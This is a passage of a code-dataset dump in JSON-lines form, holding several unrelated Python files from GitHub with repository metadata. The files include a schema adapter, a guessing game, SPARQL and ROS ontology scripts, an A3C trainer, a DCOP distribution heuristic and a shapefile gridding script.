([dataset_schema.actual_label_column_name], actual_labels),\n ([dataset_schema.actual_score_column_name], actual_scores),\n (dataset_schema.feature_column_names or (), features),\n (dataset_schema.tag_column_names or (), tags),\n ):\n # Coerce None to \"\" to simplify type checks.\n sink.extend(map(lambda s: \"\" if s is None else str(s), source))\n\n # Deduplicate and remove \"\"\n tags = list(set(filter(bool, tags)))\n features = list(set(filter(bool, features)))\n\n # Consolidate column names, by renaming if necessary.\n for specified_column_names in (\n prediction_ids,\n timestamps,\n prediction_labels,\n prediction_scores,\n actual_labels,\n actual_scores,\n ):\n assert len(specified_column_names) == len(named_dataframes)\n if len(set(filter(bool, specified_column_names))) > 1:\n # Rename all columns to match that of the first dataframe.\n pinned_column_name = _take_first_str(specified_column_names)\n for i in range(len(named_dataframes)):\n df_name, df = named_dataframes[i]\n old_column_name = specified_column_names[i]\n if old_column_name and old_column_name in df.columns:\n named_dataframes[i] = (\n df_name,\n df.rename(\n {old_column_name: pinned_column_name},\n axis=1,\n ),\n )\n\n translated_embeddings = (\n _translate_embedding(embedding, display_name)\n for display_name, 
embedding in embeddings.items()\n )\n\n return Schema(\n prediction_id=_take_first_str(prediction_ids),\n timestamp=_take_first_str(timestamps),\n prediction_label=_take_first_str(prediction_labels),\n prediction_score=_take_first_str(prediction_scores),\n actual_label=_take_first_str(actual_labels),\n actual_score=_take_first_str(actual_scores),\n features=chain(\n *_split_vectors_vs_scalars(\n features,\n *map(itemgetter(1), named_dataframes),\n ),\n translated_embeddings,\n ),\n tags=chain(\n *_split_vectors_vs_scalars(\n tags,\n *map(itemgetter(1), named_dataframes),\n )\n ),\n prompt=next(map(_translate_prompt_embedding, prompts), None),\n response=next(map(_translate_response_embedding, responses), None),\n )(\n *named_dataframes,\n timestamps_already_normalized=True,\n df_already_sorted_by_time=True,\n df_already_validated=True,\n )\n\n\ndef _is_dataset(obj: Optional[Dataset]) -> TypeGuard[Dataset]:\n return type(obj) is Dataset\n\n\ndef _take_first_str(iterator: Iterable[str]) -> str:\n return next(iter(filter(bool, iterator)), \"\")\n\n\ndef _translate_embedding(\n embedding: EmbeddingColumnNames,\n display_name: Optional[str] = None,\n) -> Embedding:\n return Embedding(\n vector=embedding.vector_column_name,\n raw_data=embedding.raw_data_column_name,\n link_to_data=embedding.link_to_data_column_name,\n display_name=display_name,\n )\n\n\ndef _translate_response_embedding(\n embedding: Union[str, EmbeddingColumnNames],\n display_name: Optional[str] = None,\n) -> Union[str, Embedding]:\n if isinstance(embedding, EmbeddingColumnNames):\n return _translate_embedding(embedding, display_name)\n return embedding\n\n\ndef _translate_prompt_embedding(\n embedding: Union[EmbeddingColumnNames, RetrievalEmbeddingColumnNames],\n display_name: Optional[str] = None,\n) -> RetrievalEmbedding:\n return RetrievalEmbedding(\n vector=embedding.vector_column_name,\n raw_data=embedding.raw_data_column_name,\n link_to_data=embedding.link_to_data_column_name,\n display_name=display_name,\n context_retrieval_ids=embedding.context_retrieval_ids_column_name\n if isinstance(embedding, RetrievalEmbeddingColumnNames)\n else None,\n context_retrieval_scores=embedding.context_retrieval_scores_column_name\n if isinstance(embedding, RetrievalEmbeddingColumnNames)\n else None,\n )\n\n\ndef _split_vectors_vs_scalars(\n names: Iterable[str],\n *dataframes: pd.DataFrame,\n) -> Tuple[List[str], List[Embedding]]:\n \"\"\"A best-effort attempt at separating vector columns from scalar columns\n by examining the first non-null item of the column from each dataframe. 
If\n any item is `Iterable` and `Sized`, but not `str`, then the column is\n returned as `Embedding`, else it's returned as scalar.\n \"\"\"\n scalars: List[str] = []\n vectors: List[Embedding] = []\n # convert to sets for a speedier lookup\n column_names = [set(df.columns) for df in dataframes]\n for name in names:\n for i, df in enumerate(dataframes):\n if df.empty or name not in column_names[i]:\n continue\n series = df.loc[:, name]\n if not is_object_dtype(series):\n continue\n item = series.iat[series.isna().argmin()]\n if (\n isinstance(item, str) # str is scalar, but Iterable\n or not isinstance(item, Iterable)\n or not isinstance(item, Sized)\n ):\n continue\n vectors.append(Embedding(vector=name))\n break\n else:\n scalars.append(name)\n return scalars, vectors\n","repo_name":"Arize-ai/phoenix","sub_path":"src/phoenix/core/model_schema_adapter.py","file_name":"model_schema_adapter.py","file_ext":"py","file_size_in_byte":8268,"program_lang":"python","lang":"en","doc_type":"code","stars":1662,"dataset":"github-code","pt":"99"} +{"seq_id":"29194050752","text":"'''\n You Think. I'll guess.\n This is a guess the number game.\n the user can think of a number and this program can guess it.\n'''\n#User's name\nprint(\"Hello! What is your name?\")\nusername = input()\n\n#the range of numbers to guess from\nprint(username + \", Please Think of a number, and i will guess it\")\nprint(\"Now, Tell me the range of numbers to guess from\")\nlow = int(input(\"the minimum is: \"))\nhigh = int(input(\"the maximum is: \"))\n\n#Bisection Algorithm\nmedium =(low + high)//2\nstate = True\n\nwhile state :\n print(\"Is your secret number is \" + str(medium)+ \"?!\")\n guess = input(\"Enter 'H' if it was too high.\\nEnter 'l' if it was too low.\\nEnter 'c' if it was correct :\")\n if guess =='c' :\n print(\"Game over, your secrert number is \"+ str(medium))\n state = False\n elif guess =='h' :\n high = medium\n medium =(low + high)//2\n\n elif guess == 'l' :\n low = medium\n medium =(low + high)//2\n else :\n print(\"Sorry, i can't understand you.\")\n \n","repo_name":"ayaabuelsoud/Guessing-the-number-Game","sub_path":"You Think. I'll guess.py","file_name":"You Think. 
I'll guess.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"14955644080","text":"from jinja2 import Environment, FileSystemLoader\nfrom SPARQLWrapper import SPARQLWrapper, POST\n\nfrom pathlib import Path\n\n\ndef exec():\n\n env = Environment(\n loader=FileSystemLoader(\n Path(__file__).parent))\n\n template = env.get_template('insert.sparql')\n\n data = {'s': '愛知県', 'p': 'wikiPageWikiLink'}\n query = template.render(data)\n\n sparql = SPARQLWrapper(\n endpoint='http://localhost:3030/ddd/update',\n returnFormat='json'\n )\n\n sparql.setMethod(POST)\n\n sparql.setQuery(query)\n\n #return query\n\n return sparql.query().convert()\n\n\nif __name__ == '__main__':\n\n print(exec())\n","repo_name":"inutomo0123/setup-sparqlwrapper","sub_path":"samples/fuseki/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7988199714","text":"#!/usr/bin/env python\n\nimport roslib\nimport rospy\nimport smach\nimport smach_ros\nimport time\nimport itertools\nimport random\nimport copy\nimport numpy as np\nfrom armor_msgs.msg import * \nfrom armor_msgs.srv import * \n\n\n# Initialize the game\nwho_list_full = [ \"White\", \"Green\", \"Peacock\", \"Plum\", \"Scarlet\", \"Mustard\"]\nwhere_list_full = [\"Kitchen\", \"Hall\", \"Ballroom\", \"Conservatory\", \"Dining\", \"Billiard\", \"Library\", \"Lounge\", \"Study\"]\nwhat_list_full = [ \"Candlestick\", \"Revolver\", \"Knife\", \"Pipe\", \"Rope\", \"Wrench\"]\n\nclasses = [\"PERSON\", \"PLACE\", \"WEAPON\"]\n\ncheck_protege = \"/root/ros_ws/src/cluedo_exp/ontology/check.owl\"\nontology_path ='/root/ros_ws/src/cluedo_exp/ontology/cluedo_ontology.owl'\n\narmor_service = None\n\nroom_number = rospy.get_param('room_number')\n\n# Initialize the entity list for ontology definition\nwho_list = copy.deepcopy(who_list_full) \nwhere_list = copy.deepcopy(where_list_full) \nwhat_list = copy.deepcopy(what_list_full)\n\ndef solution_creator():\n # Randomly select the solution\n \n who_sol = random.choice(who_list)\n where_sol = random.choice(where_list)\n what_sol = random.choice(what_list) \n \n solution = [who_sol, where_sol, what_sol]\t\n\t\n return(solution)\n \ndef solution_upload(list_of_hints):\n\n who = list_of_hints[0]\n where = list_of_hints[1]\n what = list_of_hints[2]\n \n # Create the individuals\n add_entity(who, classes[0])\n add_entity(where, classes[1])\n add_entity(what, classes[2])\n \n # Create the only hypothesis\n print(\"This is a spoil...\")\n print(list_of_hints)\n time.sleep(5)\n hypothesis = sorted([list_of_hints])\n \n # Generate the only possibe hypothesis\n hypotesis_generator(hypothesis)\n \n sol_ID = \"HP0\"\n rospy.set_param('solution_ID', sol_ID) \n print(sol_ID)\n \n # print(\"The killer is %s in the %s with the %s\" %(who, where, what))\n \ndef load_file(ontology_path):\n\n try:\n \n req = ArmorDirectiveReq()\n req.client_name = 'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 'LOAD'\n req.primary_command_spec = 'FILE'\n req.secondary_command_spec = ''\n req.args = [ontology_path, 'http://www.emarolab.it/cluedo-ontology', 'true', 'PELLET', 'true']\n msg = armor_service(req)\n res = msg.armor_response\n \n print(\"Ontology loaded!\")\n except: \n raise ValueError('Ontology NOT loaded !') \n \ndef add_entity(instance, class_type):\n\n try: \n \n req = ArmorDirectiveReq()\n req.client_name = 
'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 'ADD'\n req.primary_command_spec = 'IND'\n req.secondary_command_spec = 'CLASS'\n req.args = [instance, class_type]\n msg = armor_service(req)\n res = msg.armor_response\n reasoning()\n disjoint(class_type)\n reasoning()\n #print('%s added to the class %s!' % (instance, class_type))\n \n \n except: \n raise ValueError('Adding of %s in %s failed!' % (instance, class_type))\n\ndef disjoint(class_type):\n try:\n \n req=ArmorDirectiveReq()\n req.client_name= 'tutorial'\n req.reference_name= 'ontoTest'\n req.command= 'DISJOINT'\n req.primary_command_spec= 'IND'\n req.secondary_command_spec= 'CLASS'\n req.args= [class_type]\n msg = armor_service(req)\n \t\t \n except: \n raise ValueError('Failed to disjoint entities in %s class!' % (class_type)) \n\ndef hypotesis_generator(hyp_list):\n\n # Initialize the counter for the hypothesis\n hyp_count = 0\n hyp_string_main = \"HP\"\n # Generate the hypothesis for all the permutations\n for hyp in hyp_list:\n hyp_string = hyp_string_main + str(hyp_count)\n # Get the class of each element and creat an hypothesis\n for element in hyp:\n print(element)\n if element in who_list_full:\n hyp_classes = 'who'\n elif element in where_list_full:\n hyp_classes = 'where'\n else:\n hyp_classes = 'what'\n \n \n try: \n \n req = ArmorDirectiveReq()\n req.client_name = 'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 'ADD'\n req.primary_command_spec = 'OBJECTPROP'\n req.secondary_command_spec = 'IND'\n req.args = [hyp_classes, hyp_string, element]\n msg = armor_service(req)\n res = msg.armor_response \n \n print('%s added to the class %s as %s!' % (element, hyp_string, hyp_classes))\n \n except: \n raise ValueError('Adding of %s in %s as %s failed!' % (element, hyp_string, hyp_classes)) \n \n hyp_count += 1\n \n \n \ndef reasoning():\n\n try:\n req = ArmorDirectiveReq()\n req.client_name = 'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 'REASON'\n req.primary_command_spec = ''\n req.secondary_command_spec = ''\n req.args= []\n msg = armor_service(req)\n res = msg.armor_response\n \n except: \n raise ValueError('Reasoning failed!')\t \n\n\ndef save_owl():\n\n try:\n req = ArmorDirectiveReq()\n req.client_name = 'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 'SAVE'\n req.primary_command_spec = ''\n req.secondary_command_spec = ''\n req.args= [check_protege]\n msg = armor_service(req)\n res = msg.armor_response\n \n except: \n raise ValueError('Saving ontology failed!')\t\n\ndef main():\n\n global armor_service\n\n # Initialize the node\n rospy.init_node('armor_init') \n \n armor_service = rospy.ServiceProxy('armor_interface_srv', ArmorDirective)\n \n try:\n rospy.wait_for_service('armor_interface_srv', timeout = 5)\n except:\n # The service is not avaialble, trigger the exception\n rospy.signal_shutdown('Timeout has reachede; shutting down the armor_interface_srv cluient')\n sys.exit(1) \n \n # Load the ontology\n load_file(ontology_path)\n \n if room_number < 3:\n raise ValueError('Not enough rooms to find a correct hypothesis.')\n \n elif room_number == 3:\n \tprint(\"Too easy you have only to collect the hints...\")\n \tsolution = solution_creator()\n \t\n \tsolution_upload(solution) \n \t\t\n elif room_number > 9: \n \traise ValueError('Too many rooms in this game!!!') \n \t\t\n else:\n \n # Generate a solution and add the entity in the ontology\n solution = solution_creator()\n solution_upload(solution) \n \n # Initialize the solution space\n solution_space = 
copy.deepcopy(solution)\n \n print(solution_space)\n \n # Remove the solution elements from their list\n who_list.remove(solution[0])\n where_list.remove(solution[1])\n what_list.remove(solution[2]) \n \n \n # Roll a dice with 3 faces for each remaining rooms and randomly pick elements from the list\n for i in range(3, room_number):\n \n list_id = random.randint(0, 2) \n \n print(list_id)\n if list_id == 0:\n # Extract a new \"who\"\n new_entity = random.choice(who_list)\n class_type = classes[0]\n who_list.remove(new_entity)\n elif list_id == 1:\n # Extract a new \"where\"\n new_entity = random.choice(where_list)\n class_type = classes[1]\n where_list.remove(new_entity)\n elif list_id == 2:\n # Extract a new \"what\"\n new_entity = random.choice(what_list)\n class_type = classes[2]\n what_list.remove(new_entity) \n \n add_entity(new_entity, class_type) \n \n solution_space.append(new_entity)\n \n print(solution_space) \n \n \n # Create all the permutations with the obtained list of entity\n # set and sort are used to remove duplicates\n hypothesis_with_duplicates = itertools.permutations(solution_space, 3)\n sorted_hypothesis = []\n for x in hypothesis_with_duplicates:\n sorted_hypothesis.extend([sorted(list(x))])\n \n hypothesis = list(set(tuple(x) for x in sorted_hypothesis))\n \n # Generate all the hypothesis (INCONSISTENT or CONSISTENT)\n hypotesis_generator(hypothesis)\n \n # Find solution ID\n for ID in range(0, len(hypothesis)):\n if list(hypothesis[ID]) == sorted(solution): \n \tsol_ID = \"HP\" + str(ID) \n print(\"This is another spoil...\") \t \n print(sol_ID) \n rospy.set_param('solution_ID', sol_ID) \n \t\n \t\n # Make knowledge explicit\n reasoning()\t\t\n \n #Save the model to inspect it\n save_owl() \n\n # Wait for ctrl-c to stop the application\n rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Etruria89/Ontology_Experimental","sub_path":"scripts/armor_init.py","file_name":"armor_init.py","file_ext":"py","file_size_in_byte":9285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"43627918256","text":"'''\nGiven two strings s1 and s2. 
Check if they are anagrams.\nTwo strings are anagrams if they are made up of same characters with same frequencies\nexample:\ns1 = \"danger\"\ns2 = \"garden\"\n'''\n\n# Solution 1: O(n)T | O(n)S\ndef anagram(s1, s2):\n if len(s1) != len(s2):\n return False\n freq1 = {}\n freq2 = {}\n for char in s1:\n if char in freq1:\n freq1[char] +=1\n else:\n freq1[char] = 1\n\n for char in s2:\n if char in freq2:\n freq2[char] +=1\n else:\n freq2[char] = 1\n\n if freq1 == freq2:\n return True\n else:\n return False\n\n# Solutions 2: O(nlogn)T | O(n)S\ndef anagram2(s1, s2):\n if len(s1) != len(s2):\n return False\n if sorted(s1) == sorted(s2):\n return True\n","repo_name":"msp99000/100-Days-of-Code","sub_path":"Anagrams.py","file_name":"Anagrams.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"20001516487","text":"# -*- coding:utf8 -*-\n# File : a3c.py\n# Author : Jiayuan Mao\n# Email : maojiayuan@gmail.com\n# Date : 3/19/17\n# \n# This file is part of TensorArtist.\n\nfrom tartist.core import EnvBox, get_env, get_logger\nfrom tartist.data.rflow.query_pipe import QueryReqPipe, QueryRepPipe\nfrom tartist.nn.graph import reuse_context, Env\nfrom tartist.nn.train import SimpleTrainerEnv, SimpleTrainer\n\nimport queue\nimport threading\n\nlogger = get_logger(__file__)\n\n__all__ = ['A3CMaster', 'A3CTrainerEnv', 'A3CTrainer']\n\n\nclass A3CMaster(object):\n on_data_func = None\n on_stat_func = None\n player_func = None\n predictor_func = None\n\n def __init__(self, env, name, nr_predictors):\n self.name = name\n self.env = env\n self.router = QueryRepPipe(name + '-master', send_qsize=12, mode='tcp')\n self.queue = queue.Queue()\n\n self._nr_predictors = nr_predictors\n self._players = []\n self._predictors = []\n\n def _on_data_func(self, router, identifier, inp_data):\n self.on_data_func(self.env, identifier, inp_data)\n\n def _on_stat_func(self, router, identifier, inp_data):\n if self.on_stat_func:\n self.on_stat_func(self.env, identifier, inp_data)\n\n def _make_predictor_thread(self, i, func, daemon=True):\n return threading.Thread(target=self.predictor_func, daemon=daemon,\n args=(i, self.router, self.queue, func))\n\n def _make_player_proc(self, i, req, daemon=True):\n return EnvBox(target=self.player_func, args=(i, req), daemon=daemon)\n\n def initialize(self):\n self.router.dispatcher.register('data', self._on_data_func)\n self.router.dispatcher.register('stat', self._on_stat_func)\n self.router.initialize()\n\n assert self._nr_predictors == len(self.env.net_funcs)\n\n for i in range(self._nr_predictors):\n func = self.env.net_funcs[i]\n prc = self._make_predictor_thread(i, func, daemon=True)\n self._predictors.append(prc)\n for p in self._predictors:\n p.start()\n\n def start(self, nr_players, name=None, daemon=True):\n name = name or self.name\n self._players = []\n for i in range(nr_players):\n req = QueryReqPipe(name + ('-%d' % i), self.router.conn_info)\n prc = self._make_player_proc(i, req, daemon=daemon)\n self._players.append(prc)\n for p in self._players:\n p.start()\n if not daemon:\n for p in self._players:\n p.join()\n\n def finalize(self):\n self.router.finalize()\n\n\nclass A3CTrainerEnv(SimpleTrainerEnv):\n _player_master = None\n _net_funcs = None\n _inference_player_master = None\n _data_queue = None\n\n owner_trainer = None\n network_maker = None\n\n @property\n def net_funcs(self):\n return self._net_funcs\n\n @property\n def player_master(self):\n return 
self._player_master\n\n @property\n def inference_player_master(self):\n return self._inference_player_master\n\n @property\n def data_queue(self):\n return self._data_queue\n\n def initialize_a3c(self):\n nr_predictors = get_env('a3c.nr_predictors')\n\n # making net funcs\n self._net_funcs = []\n all_devices = self.slave_devices\n if len(all_devices) == 0:\n all_devices = self.all_devices\n for i in range(nr_predictors):\n dev = all_devices[i % len(all_devices)]\n func = self._make_predictor_net_func(i, dev)\n self._net_funcs.append(func)\n\n self._initialize_a3c_master()\n self._data_queue = queue.Queue(get_env('trainer.batch_size') * get_env('a3c.data_queue_length_factor', 16))\n\n def _initialize_a3c_master(self):\n nr_predictors = get_env('a3c.nr_predictors')\n self._player_master = A3CMaster(self, 'a3c-player', nr_predictors)\n\n self._inference_player_master = A3CMaster(self, 'a3c-inference-player', nr_predictors)\n\n def initialize_all_peers(self):\n nr_players = get_env('a3c.nr_players')\n\n self._player_master.initialize()\n if self._inference_player_master is not None:\n self._inference_player_master.initialize()\n\n # Must call initialize_all_variables before start any players.\n self.initialize_all_variables()\n self._player_master.start(nr_players, daemon=True)\n\n def finalize_all_peers(self):\n self.player_master.finalize()\n if self._inference_player_master is not None:\n self.inference_player_master.finalize()\n\n def _make_predictor_net_func(self, i, dev):\n def prefix_adder(feed_dict):\n for k in list(feed_dict.keys()):\n feed_dict['predictor/{}/{}'.format(i, k)] = feed_dict.pop(k)\n\n outputs_name = get_env('a3c.predictor.outputs_name')\n new_env = Env(master_dev=dev, flags=self.flags.clone(), dpflags=self.dpflags.clone(), sync_with=self)\n with new_env.as_default():\n with new_env.name_scope('predictor/{}'.format(i)), reuse_context(True):\n self.network_maker(new_env)\n outs = {k: new_env.network.outputs[k] for k in outputs_name}\n f = new_env.make_func()\n f.extend_extra_kw_modifiers([prefix_adder])\n if f.queue_enabled:\n f.disable_queue()\n f.compile(outputs=outs)\n return f\n\n\nclass A3CTrainer(SimpleTrainer):\n def initialize(self):\n super().initialize()\n self.env.network_maker = self.desc.make_network\n self.env.owner_trainer = self\n self.env.initialize_a3c()\n self.desc.make_a3c_configs(self.env)\n self.env.initialize_all_peers()\n\n def finalize(self):\n self.env.finalize_all_peers()\n super().finalize()\n","repo_name":"vacancy/TensorArtist","sub_path":"tartist/app/rl/train/a3c.py","file_name":"a3c.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"99"} +{"seq_id":"17824760379","text":"import logging\nfrom typing import Iterable, Callable, List, Dict, Tuple\n\nfrom collections import defaultdict\n\nfrom pydcop.computations_graph.objects import ComputationGraph, ComputationNode\nfrom pydcop.dcop.objects import AgentDef\nfrom pydcop.distribution import ilp_compref\nfrom pydcop.distribution.objects import DistributionHints, Distribution\n\nlogger = logging.getLogger('distribution.heur_comhost')\n\n\n# Weight factors when aggregating communication costs and hosting costs in the\n# objective function.\n# the global objective is built as Comm_cost * RATIO + Hosting_cost * (1-RATIO)\nRATIO_HOST_COMM = 0.5\n\n\ndef distribute(computation_graph: ComputationGraph,\n agentsdef: Iterable[AgentDef],\n hints: DistributionHints=None,\n computation_memory: Callable[[ComputationNode], 
float]=None,\n communication_load: Callable[[ComputationNode, str],\n float]=None) \\\n -> Distribution:\n \"\"\"\n\n Parameters\n ----------\n computation_graph\n agentsdef\n hints\n computation_memory\n communication_load\n\n Returns\n -------\n\n \"\"\"\n computations = sorted([(computation_memory(n), n, None)\n for n in computation_graph.nodes],\n key=lambda o: (o[0], o[1].name),\n reverse=True)\n logger.info('placing computations %s',\n [(f, c.name) for f, c, _ in computations])\n\n current_mapping = {} # Type: Dict[str, str]\n i = 0\n while len(current_mapping) != len(computations):\n footprint, computation, candidates = computations[i]\n logger.debug('Trying to place computation %s with footprint %s',\n computation.name, footprint)\n # try\n # look for agent for computation c\n if candidates is None:\n candidates = candidate_hosts(computation, footprint,\n computations, agentsdef,\n communication_load, current_mapping)\n computations[i] = footprint, computation, candidates\n logger.debug('Candidates for computation %s : %s',\n computation.name, candidates )\n\n if not candidates:\n if i==0:\n raise ValueError('Impossible Distribution !')\n\n # no candidate : backtrack !\n i -= 1\n logger.info('No candidate for %s, backtrack placement '\n 'of computation %s (was on %s',\n computation.name, computations[i][1].name,\n current_mapping[computations[i][1].name])\n current_mapping.pop(computations[i][1].name)\n\n # FIXME : eliminate selected agent for previous computation\n else:\n _, selected = candidates.pop()\n current_mapping[computation.name] = selected.name\n computations[i] = footprint, computation, candidates\n logger.debug('Place computation %s on agent %s', computation.name,\n selected.name)\n i += 1\n\n # Build the distribution for the mapping\n agt_mapping = defaultdict(lambda: [])\n for c, a in current_mapping.items():\n agt_mapping[a].append(c)\n dist = Distribution(agt_mapping)\n\n return dist\n\n\ndef distribution_cost(distribution: Distribution,\n computation_graph: ComputationGraph,\n agentsdef: Iterable[AgentDef],\n computation_memory: Callable[[ComputationNode], float],\n communication_load: Callable[[ComputationNode, str],\n float]) -> float:\n return ilp_compref.distribution_cost(\n distribution, computation_graph, agentsdef,\n computation_memory, communication_load)\n\n\ndef candidate_hosts(computation: ComputationNode, footprint: float,\n computations: List[Tuple],\n agents: Iterable[AgentDef],\n communication_load: Callable[[ComputationNode, str], float],\n mapping: Dict[str, str]):\n candidates = []\n for agt in agents:\n # Compute remaining capacity for agt, to check if it as enough place\n # left. 
Only keep agents that have enough capacity.\n capa = agt.capacity\n for c, a in mapping.items():\n if a == agt.name:\n c_footprint = next(f for f, comp, _ in computations\n if comp.name == c)\n capa -= c_footprint\n if capa < footprint:\n continue\n\n # compute cost of assigning computation to agt\n hosting_cost = agt.hosting_cost(computation.name)\n comm_cost = 0\n for l in computation.links:\n for n in l.nodes:\n if n in mapping:\n comm_cost += communication_load(computation, n) \\\n * agt.route(mapping[n])\n cost = RATIO_HOST_COMM * comm_cost + (1-RATIO_HOST_COMM) *hosting_cost\n candidates.append((cost, agt))\n\n candidates.sort(key=lambda o: (o[0], o[1].name), reverse=True)\n return candidates\n","repo_name":"bubu42/Multi_agent_system","sub_path":"venv/lib/python3.7/site-packages/pydcop/distribution/heur_comhost.py","file_name":"heur_comhost.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7335613832","text":"import shapefile\nfrom pandas import *\nimport numpy as np\nimport netCDF4\nfrom pyproj import Proj\nfrom shapely.geometry import Point, Polygon\nimport sys\nnc = netCDF4.Dataset('template_d4.nc', 'r')\nLatitude_Pole, Longitude_Pole = nc.YCENT, nc.XCENT\npnyc = Proj(proj='lcc', datum='NAD83', lat_1=10, lat_2=40,\n lat_0=Latitude_Pole, lon_0=Longitude_Pole, x_0=0, y_0=0.0)\nRESm=1000.\n\nV=[list(filter(lambda x:nc.variables[x].ndim==j, [i for i in nc.variables])) for j in [1,2,3,4]]\nnt,nlay,nrow,ncol=(nc.variables[V[3][0]].shape[i] for i in range(4))\nxmin=nc.XORIG\nymin=nc.YORIG\nxmax=nc.XORIG+(ncol+1)*nc.XCELL\nymax=nc.YORIG+(nrow+1)*nc.YCELL\nncol2=int((xmax-xmin)//RESm)\nnrow2=int((ymax-ymin)//RESm)\nX=[xmin+RESm*(i+0.5) for i in range(ncol2)]\nY=[ymin+RESm*(i+0.5) for i in range(nrow2)]\nx_g, y_g = np.meshgrid(X, Y)\nPlon, Plat= pnyc(x_g,y_g, inverse=True)\n\n\nshp='TOWN_MOI_1090727.shp'\nshape = shapefile.Reader(shp)\nf=shape.fields\nrec=shape.records()\ncol=[i[0] for i in f[1:]]\ndf=DataFrame({col[ic]:[rec[i][ic] for i in range(len(rec))] for ic in range(7)})\ndf.to_csv('record.csv')\n\nplgs,multi=[],[]\nfor i in range(len(df)):\n tp=shape.shapeRecords()[i].shape.__geo_interface__['type']\n cr=shape.shapeRecords()[i].shape.__geo_interface__['coordinates']\n if len(cr)!=1:\n multi.append(i)\n if type(cr[0][0][0])==tuple:\n plg=[cr[ic][0][:] for ic in range(len(cr))] \n else:\n plg=[cr[ic][:] for ic in range(len(cr))] \n plgs.append(plg)\n else:\n plgs.append(cr[0])\n[Dplg,mxLon,mnLon,mxLat,mnLat]=[[] for i in range(5)]\nfor plg in plgs:\n lon=[i[0] for i in plg[:]]\n lat=[i[1] for i in plg[:]]\n crd=[(i,j) for i,j in zip(lat,lon)]\n Dplg.append(crd)\n mxLon.append(np.max(lon))\n mnLon.append(np.min(lon))\n mxLat.append(np.max(lat))\n mnLat.append(np.min(lat))\nnplgs=len(df)\nDIS=np.zeros(shape=(nrow2,ncol2))\nfor i in 'mxLon,mnLon,mxLat,mnLat'.split(','):\n exec(i+'=np.array('+i+')')\nfor j in range(nrow2):\n for i in range(ncol2):\n p1=Point((Plat[j,i],Plon[j,i]))\n idx=np.where((Plat[j,i]-mnLat)*(Plat[j,i]-mxLat)<=0)\n if len(idx[0])==0: continue\n idx2=np.where((Plon[j,i]-mnLon[idx[0][:]])*(Plon[j,i]-mxLon[idx[0][:]])<=0)\n if len(idx2[0])==0: continue\n for n in list(idx[0][idx2[0]]): #loop for each polygons\n if n in multi:continue\n poly = Polygon(Dplg[n])\n if p1.within(poly): #boolean to check whether the p1 coordinates is inside the polygon or not\n DIS[j,i]=float(n)\n break\nfor n in multi:\n idx=np.where((Plat-mnLat[n])*(Plat-mxLat[n])<=0)\n 
idx2=np.where((Plon[idx[0][:],idx[1][:]]-mnLon[n])*(Plon[idx[0][:],idx[1][:]]-mxLon[n])<=0)\n cr=shape.shapeRecords()[n].shape.__geo_interface__['coordinates']\n if type(cr[0][0][0])==tuple:\n plgs=[cr[ic][0][:] for ic in range(len(cr))] \n else:\n plgs=[cr[ic][:] for ic in range(len(cr))] \n for plg in plgs:\n lon=[i[0] for i in plg[:]]\n lat=[i[1] for i in plg[:]]\n crd=[(ii,jj) for ii,jj in zip(lat,lon)]\n for ij in range(len(idx2[0])):\n j=idx[0][idx2[0][ij]]\n i=idx[1][idx2[0][ij]]\n p1=Point((Plat[j,i],Plon[j,i]))\n poly = Polygon(crd)\n if p1.within(poly): #boolean to check whether the p1 coordinates is inside the polygon or not\n DIS[j,i]=float(n)\n\n#ncks -O --mk_rec_dmn ROW template_d4_1x1.nc a.nc\n#ncks -O --mk_rec_dmn COL b.nc c.nc\n#ncks -O -v NO,TFLAG -d TSTEP,0 c.nc template_d4_1x1.nc\n#ncrename -v NO,NUM_TOWN $nc\nnc = netCDF4.Dataset('template_d4_1x1.nc', 'r+')\nV=[list(filter(lambda x:nc.variables[x].ndim==j, [i for i in nc.variables])) for j in [1,2,3,4]]\nnt,nlay,nrow,ncol=(nc.variables[V[3][0]].shape[i] for i in range(4))\nnc.NCOLS=ncol2\nnc.NROWS=nrow2\nnc.NVARS=1\nnc.NSTEPS=1\nnc.XCELL=RESm\nnc.YCELL=RESm\nif nrow!=nrow2 or ncol!=ncol2:\n for j in range(nrow2):\n for i in range(ncol2):\n nc.variables['NUM_TOWN'][0,0,j,i]=DIS[j,i]\nelse:\n nc.variables['NUM_TOWN'][0,0,:nrow,:ncol]=DIS[:,:]\nnc.close()\t\n","repo_name":"sinotec2/cmaq_relatives","sub_path":"land/gridmask/withinD5.py","file_name":"withinD5.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"18649162054","text":"import matplotlib\nmatplotlib.use(\"AGG\")\n\nexecfile(\"config.py\")\n\nimport simparams\nimport measfct\n\n\nncpu = 1\n\n\nsp = simparams.GauShear1()\n\n\"\"\"\nmegalut.sim.run.multi(\n\tsimdir=workdir,\n\tsimparams=sp,\n\tdrawcatkwargs={\"n\":1000, \"nc\":50, \"stampsize\":128},\n\tdrawimgkwargs={}, \n\tpsfcat=None, psfselect=\"random\",\n\tncat=1, nrea=1, ncpu=ncpu,\n\tsavepsfimg=False, savetrugalimg=False\n\t)\n\"\"\"\n\nmegalut.meas.run.onsims(\n\tsimdir=workdir,\n\tsimparams=sp,\n\tmeasdir=workdir,\n\tmeasfct=measfct.default,\n\tmeasfctkwargs={\"stampsize\":128},\n\tncpu=ncpu,\n\tskipdone=False\n\t)\n\n\"\"\"\n\ncat = megalut.meas.avg.onsims(\n\tmeasdir=workdir, \n\tsimparams=sp,\n\ttask=\"group\",\n\tgroupcols=measfct.default_groupcols, 